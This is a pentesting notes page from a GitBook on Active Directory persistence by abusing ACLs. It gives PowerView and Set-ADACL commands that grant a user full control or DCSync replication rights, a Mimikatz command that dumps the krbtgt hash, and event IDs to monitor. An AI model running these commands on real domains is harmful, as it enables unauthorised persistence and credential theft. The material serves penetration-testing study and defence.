☠️
Pentesting Articles and Notes
  • Welcome!
  • Windows
    • Active Directory
      • Kerberos Authentication
      • Enumeration
        • Basic Enumeration
        • Access Control Lists
        • Domain Trusts and Forests Enumeration
        • User Hunting
        • Domain Enumeration With BloodHound
      • Credential Dumping
        • DCSync Attack
      • Privilege Escalation
        • AS-REP Roasting
        • Kerberoasting
        • DNS Administrators
        • Setting Object SPN's
        • Unconstrained Delegation
        • Constrained Delegation
      • Persistence
        • Abusing ACLs
        • AdminSDHolder
        • Custom Security Service Providers (SSP's)
        • Directory Services Restore Mode (DSRM)
        • Modifying Remote Protocol Security Descriptors
        • Golden Tickets
        • Silver Tickets
        • Skeleton Keys
      • Powershell Remoting
      • Lateral Movement
        • Child to Parent Movement Across Trusts
        • Trust Abuse Between Forests
        • MSSQL Server Trust Abuse
        • Overpass the Hash
  • Coding
    • Pentesting With Python
      • Basic Threading
  • Network Attacks
    • Man-In-The-Middle Attacks
      • ARP Spoofing
      • DNS Spoofing Attacks
Powered by GitBook
On this page
  • Useful Commands From Powershell
  • Give a User Full Control Rights over the Domain Object Itself
  • Give a User Replication Rights
  • You Can Then Run DCSync on Any User You Want Afterwards
  • Mitigations
  1. Windows
  2. Active Directory
  3. Persistence

Abusing ACLs

PreviousPersistenceNextAdminSDHolder

Last updated 3 years ago

With the privileges of a Domain Admin, we can change the ACL rights for any user we wish to maintain persistence in a network.

Depending on the rights you change and on whom you change them, this can be a stealthy technique provided that no code gets executed on the Domain Controller. One such method is to give a user replication rights to then execute DCSync with and extract the krbtgt hash.

Useful Commands From Powershell

Give a User Full Control Rights over the Domain Object Itself

  • I should note this technique could be easily spotted...

# PowerView
Add-ObjectAcl -TargetDistinguishedName 'DC=domain,DC=local' -PrincipalSamAccountName <user> -Rights All -Verbose

# AD Module with Set-ADACL.ps1
Set-ADACL -DistinguishedName 'DC=domain,DC=local' -Principal <user> -Verbose

Give a User Replication Rights

  • A much quieter technique than the above. It requires 3 rights to be given:

    1. Replicating Directory Changes

    2. Replicating Directory Changes All

    3. Replicating Directory Changes in Filtered Set

# PowerView
Add-ObjectAcl -TargetDistinguishedName 'DC=domain,DC=local' -PrincipalSamAccountName <user> -Rights DCSync -Verbose

# AD Module with Set-ADACL.ps1
Set-ADACL -DistinguishedName 'DC=domain,DC=local' -Principal <user> -GUIDRight DCSync -Verbose

You Can Then Run DCSync on Any User You Want Afterwards

Invoke-Mimikatz -Command '"lsadump::dcsync /user:<domain>\krbtgt"'

Mitigations

  • Monitor Secutiry events:

    • 4662 - Operations on objects

    • 5136 - Modification of Objects

    • 4670 - Changed Object Permissions

AD ACL Scanner